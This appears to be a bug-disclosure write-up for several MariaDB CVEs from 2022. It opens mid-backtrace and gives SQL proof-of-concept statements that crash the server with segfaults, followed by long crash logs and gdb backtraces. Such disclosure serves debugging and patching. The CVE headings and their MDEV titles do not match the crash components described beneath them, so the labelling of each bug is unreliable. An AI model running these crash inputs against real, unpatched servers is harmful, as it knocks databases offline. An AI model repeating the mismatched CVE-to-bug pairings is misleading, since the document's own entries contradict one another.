#13 0x000055bb56326800 in open\_and\_lock\_tables (thd=thd@entry=0x62b0000bd218, options=..., tables=<optimized out>, tables@entry=0x629000087408, derived=derived@entry=true, flags=flags@entry=0, prelocking\_strategy=prelocking\_strategy@entry=0x7f987ba592d0) at /experiment/mariadb-server/sql/sql\_base.cc:5261

#14 0x000055bb563dcef4 in open\_and\_lock\_tables (flags=0, derived=true, tables=0x629000087408, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.h:509

#15 mysql\_insert (thd=thd@entry=0x62b0000bd218, table\_list=0x629000087408, fields=..., values\_list=..., update\_fields=..., update\_values=..., duplic=<optimized out>, ignore=<optimized out>, result=<optimized out>) at /experiment/mariadb-server/sql/sql\_insert.cc:757

#16 0x000055bb56495bb8 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:4565

#17 0x000055bb564a25a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#18 0x000055bb564a860c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#19 0x000055bb564ad73d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#20 0x000055bb56868e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#21 0x000055bb5686933d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#22 0x000055bb572f9c2c in pfs\_spawn\_thread (arg=0x617000005f18) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#23 0x00007f989ace7259 in start\_thread () from /usr/lib/libpthread.so.0

#24 0x00007f989a8925e3 in clone () from /usr/lib/libc.so.6

(gdb) quit

CVE-2022-32085: [MDEV-26407] Server crashes in Item_func_in::cleanup/Item::cleanup_processor

MariaDB v10.4 to v10.8 was discovered to contain a segmentation fault via the component Item_field::fix_outer_field.

PoC:

CREATE TABLE v0 ( v1 BIGINT ( 67 ) NOT NULL ) ;

 CREATE TABLE v2 ( v4 INT , v3 INT NOT NULL UNIQUE KEY CHECK ( -128 | ( str\_to\_date ( CHAR ( 33 ) , 'x' ) ) ) ) ;

 DROP FUNCTION IF EXISTS v0 ;

 INSERT INTO v0 SELECT DISTINCT \* FROM v0 FULL JOIN v2 ON ( SELECT v0 . v1 ) ;

Crash Log:

Version: '10.7.0-MariaDB'  socket: '/tmp/18.socket'  port: 10018  Source distribution

210816 15:33:24 \[ERROR\] mysqld got signal 11 ;

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed, 

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f722a3fd850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f7249ca9c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55c05f113747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55c05e0db120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f7249693870\]

sql/item.cc:5561(Item\_field::fix\_outer\_field(THD\*, Field\*\*, Item\*\*))\[0x55c05e168491\]

sql/item.cc:5982(Item\_field::fix\_fields(THD\*, Item\*\*))\[0x55c05e16b34c\]

sql/item.h:1148(Item::fix\_fields\_if\_needed\_for\_scalar(THD\*, Item\*\*))\[0x55c05d80a2ed\]

sql/sql\_select.cc:1397(JOIN::prepare(TABLE\_LIST\*, Item\*, unsigned int, st\_order\*, bool, st\_order\*, Item\*, st\_order\*, st\_select\_lex\*, st\_select\_lex\_unit\*))\[0x55c05dac647c\]

sql/item\_subselect.cc:3903(subselect\_single\_select\_engine::prepare(THD\*))\[0x55c05e3cf4f6\]

sql/item\_subselect.cc:295(Item\_subselect::fix\_fields(THD\*, Item\*\*))\[0x55c05e3ccd05\]

sql/item.h:1148(Item::fix\_fields\_if\_needed\_for\_scalar(THD\*, Item\*\*))\[0x55c05d810338\]

sql/sql\_base.cc:8454(setup\_conds(THD\*, TABLE\_LIST\*, List<TABLE\_LIST>&, Item\*\*))\[0x55c05d810d40\]

sql/sql\_select.cc:833(JOIN::prepare(TABLE\_LIST\*, Item\*, unsigned int, st\_order\*, bool, st\_order\*, Item\*, st\_order\*, st\_select\_lex\*, st\_select\_lex\_unit\*))\[0x55c05dac6748\]

sql/sql\_select.cc:4967(mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*))\[0x55c05db0dcaa\]

sql/sql\_select.cc:545(handle\_select(THD\*, LEX\*, select\_result\*, unsigned long))\[0x55c05db0e655\]

sql/sql\_parse.cc:4718(mysql\_execute\_command(THD\*, bool))\[0x55c05d97d9c1\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55c05d9805a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55c05d98660c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55c05d98b73d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55c05dd46e57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55c05dd4733d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55c05e7d7c2c\]

pthread\_create.c:0(start\_thread)\[0x7f7249689259\]

:0(\_\_GI\_\_\_clone)\[0x7f72492345e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): INSERT INTO v0 SELECT DISTINCT \* FROM v0 FULL JOIN v2 ON ( SELECT v0 . v1 )

Connection ID (thread ID): 4

Status: NOT\_KILLED

CVE-2022-32086: [MDEV-26412] Server crash in Item_field::fix_outer_field for INSERT SELECT

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort.

CREATE TABLE v0 ( v1 TINYINT NULL ) ;

 TRUNCATE TABLE v0 ;

 SELECT instr ( COALESCE ( sqrt ( ( quote ( 'x' / 46 ) ) + 0 ) , 'x' ) , 51 ) ;

 SAVEPOINT v0 ;

 SELECT 16 / 'x' AS v2 UNION SELECT -2147483648 AS v3 ORDER BY ( LAST\_VALUE ( 'x' ) OVER ( ) ) LIMIT 6 ;

 REPLACE INTO v0 VALUES ( TRUE ) ;

2021-08-16 14:41:38 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:41:38 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:38 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld (initiated by: root\[root\] @ localhost \[\]): Normal shutdown

2021-08-16 14:41:39 0 \[Note\] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 \[Note\] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 \[Note\] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:39 0 \[Note\] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 \[Note\] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 \[Note\] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 15:01:54 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 15:01:54 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 15:01:54 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 15:01:54 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 15:01:54 0 \[Note\] InnoDB: Using liburing

2021-08-16 15:01:54 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 15:01:54 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 15:02:07 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 15:02:07 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 15:02:07 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 15:02:07 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 15:02:07 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 15:02:07 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/4/ib\_buffer\_pool

2021-08-16 15:02:07 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 15:02:07 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 15:02:07 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 15:02:08 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 15:02:08

2021-08-16 15:02:09 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/4.socket'  port: 10004  Source distribution

210816 15:02:10 \[ERROR\] mysqld got signal 11 ;

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed, 

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f625c527850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f627bdd3c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55cd04b35747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55cd03afd120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f627b7bd870\]

sql/sql\_analyze\_stmt.h:89(Exec\_time\_tracker::get\_loops() const)\[0x55cd03af5195\]

sql/sql\_select.cc:24388(create\_sort\_index(THD\*, JOIN\*, st\_join\_table\*, Filesort\*))\[0x55cd034dc699\]

sql/sql\_window.cc:3007(Window\_funcs\_sort::exec(JOIN\*, bool))\[0x55cd03935d79\]

sql/sql\_window.cc:3140(Window\_funcs\_computation::exec(JOIN\*, bool))\[0x55cd03938435\]

sql/sql\_select.cc:29457(AGGR\_OP::end\_send())\[0x55cd0350fc76\]

sql/sql\_select.cc:20766(sub\_select\_postjoin\_aggr(JOIN\*, st\_join\_table\*, bool))\[0x55cd035105d0\]

sql/sql\_select.cc:20604(JOIN::exec\_inner())\[0x55cd0353482c\]

sql/sql\_select.cc:4514(JOIN::exec())\[0x55cd03536593\]

sql/sql\_select.cc:4993(mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*))\[0x55cd0352eb5b\]

sql/sql\_union.cc:2360(st\_select\_lex\_unit::exec())\[0x55cd0365117f\]

sql/sql\_union.cc:43(mysql\_union(THD\*, LEX\*, select\_result\*, st\_select\_lex\_unit\*, unsigned long))\[0x55cd0365d7b8\]

sql/sql\_class.h:4325(THD::is\_error() const)\[0x55cd035303a0\]

sql/sql\_parse.cc:6256(execute\_sqlcom\_select(THD\*, TABLE\_LIST\*))\[0x55cd03373d7d\]

sql/sql\_parse.cc:3946(mysql\_execute\_command(THD\*, bool))\[0x55cd0339d421\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55cd033a25a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55cd033a860c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55cd033ad73d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55cd03768e57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55cd0376933d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55cd041f9c2c\]

pthread\_create.c:0(start\_thread)\[0x7f627b7b3259\]

:0(\_\_GI\_\_\_clone)\[0x7f627b35e5e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): SELECT 16 / 'x' AS v2 UNION SELECT -2147483648 AS v3 ORDER BY ( LAST\_VALUE ( 'x' ) OVER ( ) ) LIMIT 6

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/4

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us      

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86\_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

\[New LWP 639727\]

\[New LWP 586228\]

\[New LWP 629512\]

\[New LWP 630498\]

\[New LWP 586314\]

\[New LWP 643180\]

\[New LWP 629544\]

\[New LWP 586347\]

\[New LWP 586033\]

\[New LWP 630466\]

\[New LWP 630472\]

\[New LWP 630499\]

\[New LWP 630529\]

\[New LWP 639688\]

\[New LWP 586318\]

\[Thread debugging using libthread\_db enabled\]

Using host libthread\_db library "/usr/lib/libthread\_db.so.1".

Core was generated by \`/usr/local/mysql/bin//mysqld --port 10004 --datadir=/home/fuboat/mariadb-tmp/4'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  0x00007f627b7ba808 in pthread\_kill () from /usr/lib/libpthread.so.0

\[Current thread is 1 (Thread 0x7f625c528240 (LWP 639727))\]

(gdb) (gdb) #0  0x00007f627b7ba808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055cd03afd06b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x000055cd03af5195 in Exec\_time\_tracker::get\_loops (this=0x0) at /experiment/mariadb-server/sql/sql\_analyze\_stmt.h:89

#4  Filesort\_tracker::report\_use (r\_limit\_arg=18446744073709551615, thd=0x62b0000bd218, this=0x0) at /experiment/mariadb-server/sql/sql\_analyze\_stmt.h:235

#5  filesort (thd=<optimized out>, table=table@entry=0x61f00000fcb8, filesort=filesort@entry=0x629000092dd8, tracker=<optimized out>, join=join@entry=0x62900008a768, first\_table\_bit=<optimized out>) at /experiment/mariadb-server/sql/filesort.cc:267

#6  0x000055cd034dc699 in create\_sort\_index (thd=thd@entry=0x62b0000bd218, join=join@entry=0x62900008a768, tab=tab@entry=0x629000092068, fsort=0x629000092dd8) at /experiment/mariadb-server/sql/sql\_select.cc:24386

#7  0x000055cd03935d79 in Window\_funcs\_sort::exec (this=0x629000092bf0, join=join@entry=0x62900008a768, keep\_filesort\_result=keep\_filesort\_result@entry=false) at /experiment/mariadb-server/sql/sql\_window.cc:3007

#8  0x000055cd03938435 in Window\_funcs\_computation::exec (this=<optimized out>, join=join@entry=0x62900008a768, keep\_last\_filesort\_result=keep\_last\_filesort\_result@entry=false) at /experiment/mariadb-server/sql/sql\_window.cc:3140

#9  0x000055cd0350fc76 in AGGR\_OP::end\_send (this=0x62900008b1f0) at /experiment/mariadb-server/sql/sql\_select.cc:29457

#10 0x000055cd035105d0 in sub\_select\_postjoin\_aggr (join=0x62900008a768, join\_tab=0x629000092068, end\_of\_records=<optimized out>) at /experiment/mariadb-server/sql/sql\_select.cc:20765

#11 0x000055cd0353482c in do\_select (procedure=0x0, join=0x62900008a768) at /experiment/mariadb-server/sql/sql\_select.cc:20604

#12 JOIN::exec\_inner (this=0x62900008a768) at /experiment/mariadb-server/sql/sql\_select.cc:4735

#13 0x000055cd03536593 in JOIN::exec (this=this@entry=0x62900008a768) at /experiment/mariadb-server/sql/sql\_select.cc:4513

#14 0x000055cd0352eb5b in mysql\_select (thd=0x62b0000bd218, tables=tables@entry=0x62b0000c1408, fields=..., conds=conds@entry=0x0, og\_num=1, order=0x629000088f68, group=0x0, having=0x0, proc\_param=0x0, select\_options=<optimized out>, result=0x6290000890a8, unit=0x62b0000c13c0, select\_lex=0x629000088788)

    at /experiment/mariadb-server/sql/sql\_select.cc:4991

#15 0x000055cd0365117f in st\_select\_lex\_unit::exec (this=0x62b0000c13c0) at /experiment/mariadb-server/sql/sql\_union.cc:2360

#16 0x000055cd0365d7b8 in mysql\_union (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x6290000890a8, unit=unit@entry=0x62b0000c13c0, setup\_tables\_done\_option=<optimized out>) at /experiment/mariadb-server/sql/sql\_union.cc:42

#17 0x000055cd035303a0 in handle\_select (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x6290000890a8, setup\_tables\_done\_option=setup\_tables\_done\_option@entry=0) at /experiment/mariadb-server/sql/sql\_select.cc:535

#18 0x000055cd03373d7d in execute\_sqlcom\_select (thd=0x62b0000bd218, all\_tables=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:6256

#19 0x000055cd0339d421 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:3946

#20 0x000055cd033a25a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#21 0x000055cd033a860c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#22 0x000055cd033ad73d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#23 0x000055cd03768e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#24 0x000055cd0376933d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#25 0x000055cd041f9c2c in pfs\_spawn\_thread (arg=0x617000005b98) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#26 0x00007f627b7b3259 in start\_thread () from /usr/lib/libpthread.so.0

#27 0x00007f627b35e5e3 in clone () from /usr/lib/libc.so.6

(gdb) quit

CVE-2022-32088: [MDEV-26419] A SEGV in Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component Item_args::walk_args.

CREATE TABLE v0 ( v2 INT NOT NULL , v1 BIGINT AS ( CASE 'x' WHEN CURRENT\_USER ( ) THEN v2 END ) ) ;

 SELECT v2 AS v3 FROM v0 WHERE v1 LIKE 'x' ESCAPE 'x' ;

 INSERT INTO v0 VALUES ( -128 , NULL , NULL , NULL , NULL , TO\_DATE ( 'x' , 'x' ) ) ;

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f9fca453850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f9fe9cffc3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x556139072747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55613803a120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f9fe96e9870\]

:0(\_\_GI\_raise)\[0x7f9fe91c8d22\]

:0(\_\_GI\_abort)\[0x7f9fe91b2862\]

libsupc++/vterminate.cc:75(\_\_gnu\_cxx::\_\_verbose\_terminate\_handler())\[0x7f9fe9552802\]

libsupc++/eh\_terminate.cc:48(\_\_cxxabiv1::\_\_terminate(void (\*)()))\[0x7f9fe955ec8a\]

??:0(std::terminate())\[0x7f9fe955ecf7\]

??:0(\_\_cxa\_pure\_virtual)\[0x7f9fe955fa75\]

sql/item.cc:1121(Item::check\_type\_scalar(st\_mysql\_const\_lex\_string const&) const)\[0x5561380a4308\]

sql/item\_func.cc:271(Item\_func::check\_argument\_types\_scalar(unsigned int, unsigned int) const)\[0x5561381e2a5b\]

sql/item\_func.cc:357(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x5561381ce34e\]

sql/item\_cmpfunc.cc:3131(Item\_func\_case::fix\_fields(THD\*, Item\*\*))\[0x556138100700\]

sql/table.cc:3590(fix\_vcol\_expr(THD\*, Virtual\_column\_info\*))\[0x556137be6ee2\]

sql/sql\_base.cc:5429(TABLE::fix\_vcol\_exprs(THD\*))\[0x55613775e1ca\]

sql/sql\_base.cc:5467(lock\_tables(THD\*, TABLE\_LIST\*, unsigned int, unsigned int))\[0x55613775ef93\]

sql/sql\_base.cc:5261(open\_and\_lock\_tables(THD\*, DDL\_options\_st const&, TABLE\_LIST\*, bool, unsigned int, Prelocking\_strategy\*))\[0x556137763800\]

sql/sql\_base.h:397(open\_and\_lock\_tables(THD\*, TABLE\_LIST\*, bool, unsigned int))\[0x556137819ef4\]

sql/sql\_parse.cc:4565(mysql\_execute\_command(THD\*, bool))\[0x5561378d2bb8\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x5561378df5a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x5561378e560c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x5561378ea73d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x556137ca5e57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x556137ca633d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x556138736c2c\]

pthread\_create.c:0(start\_thread)\[0x7f9fe96df259\]

:0(\_\_GI\_\_\_clone)\[0x7f9fe928a5e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): INSERT INTO v0 VALUES ( -128 , NULL , NULL , NULL , NULL , TO\_DATE ( 'x' , 'x' ) )

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/5

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us        

Core pattern: core

Using host libthread\_db library "/usr/lib/libthread\_db.so.1".

Core was generated by \`/usr/local/mysql/bin//mysqld --port 10005 --datadir=/home/fuboat/mariadb-tmp/5'.

Program terminated with signal SIGABRT, Aborted.

